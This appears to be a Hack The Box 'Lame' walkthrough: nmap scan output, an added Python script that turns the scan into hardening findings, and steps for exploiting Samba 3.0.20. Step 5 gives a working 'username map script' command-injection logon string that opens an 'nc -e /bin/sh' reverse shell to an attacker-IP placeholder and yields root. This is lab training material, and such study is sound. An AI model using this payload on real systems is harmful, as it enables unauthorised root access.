Recon

  • IP: 10.10.10.3
$ nmap -sC -sV -oA ~/Document/htb/oscp/lame -Pn 10.10.10.3
21/tcp  open  ftp         syn-ack vsftpd 2.3.4        
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:       
|   STAT:         
| FTP server status:                                  
|      Connected to 10.10.16.3                        
|      Logged in as ftp                               
|      TYPE: ASCII
|      No session bandwidth limit                     
|      Session timeout in seconds is 300              
|      Control connection is plain text               
|      Data connections will be plain text            
|      vsFTPd 2.3.4 - secure, fast, stable            
|_End of status   
22/tcp  open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-p   syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)         
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:                 
|_clock-skew: mean: 2h00m22s, deviation: 2h49m45s, median: 19s           
|_smb2-security-mode: Couldn't establish a SMBv2 connection.             
| smb-os-discovery:                  
|   OS: Unix (Samba 3.0.20-Debian)   
|   Computer name: lame              
|   NetBIOS computer name:           
|   Domain name: hackthebox.gr       
|   FQDN: lame.hackthebox.gr         
|_  System time: 2023-06-17T09:25:28-04:00                               
| smb-security-mode:                                  
|   account_used: guest                               
|   authentication_level: user       
|   challenge_response: supported    
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)       
| p2p-conficker:  
|   Checking for Conficker.C or higher...             
|   Check 1 (port 59488/tcp): CLEAN (Timeout)         
|   Check 2 (port 30433/tcp): CLEAN (Timeout)         
|   Check 3 (port 40169/udp): CLEAN (Timeout)         
|   Check 4 (port 48278/udp): CLEAN (Timeout)         
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Noting:

  • Samba 3.0.20-Debian
    • Port: 445
    • DOMAIN: hackthebox.gr
    • FQDN: lame.hackthebox.gr
  • vsftpd 2.3.4 - Port: 21
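The versions and SMB flags noted above are exactly what a defender would want pulled automatically out of a scan. The following is an added example, not part of the original notes: it parses the nmap -sV port lines and NSE script lines (a constructed sample built from the output above) and emits a hardening finding for each weak point: a Samba release older than 3.0.25 (the "username map script" fix), SMB signing disabled, a legacy vsftpd 2.x build, and anonymous FTP. The version threshold and the smb.conf / vsftpd.conf keys are real; the rule set itself is this example's own choice.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the relevant lines of the nmap -sC -sV output above
NMAP_OUTPUT = """\
21/tcp  open  ftp         syn-ack vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-p   syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+syn-ack\s+(.*)$")
VERSION = re.compile(r"\d+(?:\.\d+)+")  # first dotted numeric version in a banner


def version_tuple(banner: str) -> Optional[Tuple[int, ...]]:
    """'Samba smbd 3.0.20-Debian' -> (3, 0, 20); '3.X - 4.X' has no numeric version -> None."""
    m = VERSION.search(banner)
    return tuple(int(x) for x in m.group(0).split(".")) if m else None


def parse_scan(text: str) -> Tuple[List[Dict], List[str]]:
    """Split nmap output into per-port service records and host-level script lines.

    NSE lines ('|' / '|_') that follow a port line belong to that port; lines after
    'Host script results:' belong to the host as a whole.
    """
    services: List[Dict] = []
    host_scripts: List[str] = []
    in_host_section = False
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, name, banner = m.groups()
            services.append({"port": int(port), "proto": proto, "service": name,
                             "banner": banner, "version": version_tuple(banner),
                             "scripts": []})
            in_host_section = False
        elif line.startswith("Host script results"):
            in_host_section = True
        elif line.startswith("|"):
            cleaned = line.lstrip("|_ ").strip()
            if in_host_section or not services:
                host_scripts.append(cleaned)
            else:
                services[-1]["scripts"].append(cleaned)
    return services, host_scripts


def assess(services: List[Dict], host_scripts: List[str]) -> List[str]:
    """Hardening rules; each finding names where it applies and the configuration fix."""
    findings: List[str] = []
    for s in services:
        ver = s["version"]
        ver_str = ".".join(map(str, ver)) if ver else "?"
        scripts = " ".join(s["scripts"])
        if s["banner"].startswith("Samba") and ver and ver < (3, 0, 25):
            findings.append(f"{s['port']}/{s['proto']}: Samba {ver_str} predates 3.0.25; upgrade and "
                            "remove any 'username map script' line from smb.conf")
        if s["banner"].startswith("vsftpd") and ver and ver < (3,):
            findings.append(f"{s['port']}/{s['proto']}: vsftpd {ver_str} is a legacy 2.x build; upgrade")
        if "Anonymous FTP login allowed" in scripts:
            findings.append(f"{s['port']}/{s['proto']}: anonymous FTP enabled; "
                            "set anonymous_enable=NO in vsftpd.conf")
    if any("message_signing: disabled" in line for line in host_scripts):
        findings.append("host: SMB signing disabled; set 'server signing = mandatory' in smb.conf")
    return findings


if __name__ == "__main__":
    svc, host = parse_scan(NMAP_OUTPUT)
    for f in assess(svc, host):
        print(f)
```

Port 139 is reported with the vague banner "3.X - 4.X", so it carries no numeric version and is deliberately not flagged; the precise 3.0.20 banner on 445 is what drives the Samba finding.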

Steps

  1. Samba 3.0.20-Debian is vulnerable to the Samba 3.x "username map script" attack
  2. smbclient -L 10.10.10.3
    • Side note: if listing fails on protocol negotiation, set these in the [global] section of /etc/samba/smb.conf on the attacking machine:
      • client min protocol = NT1
      • client max protocol = SMB3
  3. Found /tmp
  4. smbclient //10.10.10.3/tmp -N (anonymous login, no password)
  5. In the smbclient console, trigger the remote shell with logon "/=`nohup nc -e /bin/sh [attacker_ip] [attacker_port]`", replacing both placeholders with your machine's IP and a port you are listening on
  6. The returned shell is root (# prompt)

Tips:

  • use searchsploit for fast vulnerability searching
  • always run a fast nmap scan first (-T5 or --min-rate 10000) across all ports (-p-)